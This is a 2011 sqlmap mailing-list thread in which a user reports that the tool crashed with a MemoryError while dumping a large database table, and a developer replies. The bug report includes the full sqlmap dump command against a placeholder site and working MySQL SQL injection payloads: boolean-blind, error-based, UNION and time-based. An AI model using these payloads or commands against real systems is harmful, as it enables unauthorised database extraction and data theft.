Re: [sqlmap-users] Memory problems
From: Miroslav S. <mir...@gm...> - 2011-01-27 19:55:30
http://mail.python.org/pipermail/mailman-users/2005-October/047436.html

"A MemoryError exception is a built-in Python exception "Raised when an operation runs out of memory but the situation may still be rescued (by deleting some objects)." How many members does this list have? According to the FAQ, the largest list reported to date has 147,000 members and presumably works. Possibly something in the cPanel implementation or your particular installation limits this to a greater degree."

now, this messes our concept a bit but we'll try to adapt.

kr

On Thu, Jan 27, 2011 at 8:45 PM, Miroslav Stampar <mir...@gm...> wrote:
> LOL (50,350 entries in the table and 48 columns)
>
> we'll try to make some tests regarding this and report accordingly.
> haven't planned this kind of "huge" data retrievals :)
>
> kr
>
> On Thu, Jan 27, 2011 at 8:40 PM, David Guimaraes <sk...@gm...> wrote:
>> # ./sqlmap.py --method post --cookie "PHPSESSID=7i2j7ou46iu4c62xxx4kemiql6"
>> --data "vulnparam=6" -u "http://www.vulnsite.com/intranet/vulnphp.php" -v 3
>> -D nomes -T class --dump
>>
>> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
>> http://sqlmap.sourceforge.net
>>
>> [*] starting at: 16:58:05
>>
>> [16:58:05] [DEBUG] cleaning up configuration parameters
>> [16:58:05] [DEBUG] setting the HTTP timeout
>> [16:58:05] [DEBUG] setting the HTTP Cookie header
>> [16:58:05] [DEBUG] setting the HTTP method to POST
>> [16:58:05] [DEBUG] creating HTTP requests opener object
>> [16:58:05] [INFO] using
>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session' as session file
>> [16:58:05] [INFO] resuming injection data from session file
>> [16:58:05] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
>> [16:58:05] [INFO] testing connection to the target url
>> you provided an HTTP Cookie header value. The target url provided its own
>> Cookie within the HTTP Set-Cookie header. Do you want to continue using the
>> HTTP Cookie values that you provided? [Y/n]
>> sqlmap identified the following injection points with a total of 0 HTTP(s)
>> requests:
>> ---
>> Place: POST
>> Parameter: vulnparam
>> Type: boolean-based blind
>> Title: AND boolean-based blind - WHERE or HAVING clause
>> Payload: vulnparam=6 AND 5647=5647
>>
>> Type: error-based
>> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
>> Payload: vulnparam=6 AND (SELECT 714 FROM(SELECT
>> COUNT(*),CONCAT(CHAR(58,111,106,112,58),(SELECT (CASE WHEN (714=714) THEN 1
>> ELSE 0 END)),CHAR(58,99,99,109,58),FLOOR(RAND(0)*2))x FROM
>> information_schema.tables GROUP BY x)a)
>>
>> Type: UNION query
>> Title: MySQL UNION query (NULL) - 4 to 7 columns
>> Payload: vulnparam=6 UNION ALL SELECT NULL, NULL,
>> CONCAT(CHAR(58,111,106,112,58),IFNULL(CAST(CHAR(101,76,89,111) AS CHAR),
>> CHAR(32)),CHAR(58,99,99,109,58)), NULL, NULL#
>>
>> Type: AND/OR time-based blind
>> Title: MySQL > 5.0.11 AND time-based blind
>> Payload: vulnparam=6 AND SLEEP(5)
>> ---
>>
>> [16:58:06] [INFO] the back-end DBMS is MySQL
>>
>> web application technology: PHP 5.3.2
>> back-end DBMS: MySQL 5.0
>> [16:58:06] [INFO] fetching columns for table 'class' on database 'nomes'
>> [16:58:06] [INFO] read from file
>> '/home/kkk/sqlmap-dev/output/www.vulnsite.com/session': vulncolumns
>> [16:58:06] [INFO] fetching entries for table 'class' on database 'nomes'
>> [16:58:06] [PAYLOAD] 6 UNION ALL SELECT NULL, NULL,
>> CONCAT(CHAR(58,101,110,122,58),XXX,CHAR(58,111,115,122,58)), NULL, NULL FROM
>> nomes.class#
>> [17:00:09] [DEBUG] performed 1 queries in 122 seconds
>>
>> [17:00:13] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run
>> with the latest development version from the Subversion repository. If the
>> exception persists, please send by e-mail to
>> sql...@li... the command line, the following text and
>> any information needed to reproduce the bug. The developers will try to
>> reproduce the bug, fix it accordingly and get back to you.
>> sqlmap version: 0.9-dev
>> Python version: 2.6.5
>> Operating system: posix
>> Traceback (most recent call last):
>>   File "./sqlmap.py", line 83, in main
>>     start()
>>   File "/home/kkk/sqlmap-dev/lib/controller/controller.py", line 414, in
>> start
>>     action()
>>   File "/home/kkk/sqlmap-dev/lib/controller/action.py", line 103, in action
>>     conf.dumper.dbTableValues(conf.dbmsHandler.dumpTable())
>>   File "/home/kkk/sqlmap-dev/plugins/generic/enumeration.py", line 1189, in
>> dumpTable
>>     entries = inject.getValue(query, blind=False, dump=True)
>>   File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 427, in getValue
>>     value = __goInband(query, expected, sort, resumeValue, unpack, dump)
>>   File "/home/kkk/sqlmap-dev/lib/request/inject.py", line 384, in __goInband
>>     data = parseUnionPage(output, expression, partial, None, sort)
>>   File "/home/kkk/sqlmap-dev/lib/core/common.py", line 785, in
>> parseUnionPage
>>     dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url,
>> kb.injection.place, conf.parameters[kb.injection.place], expression,
>> logOutput))
>> MemoryError
>>
>> [*] shutting down at: 17:00:13
>>
>> There are about 50,350 entries in the table and 48 columns. I tested the
>> query manually, and returned a page with 600k of information. I think that
>> sqlmap did not support the amount of data...?
>>
>> David

--
Miroslav Stampar

E-mail / Jabber: miroslav.stampar (at) gmail.com
Mobile: +385921010204 (HR 0921010204)
PGP Key ID: 0xB5397B1B
Location: Zagreb, Croatia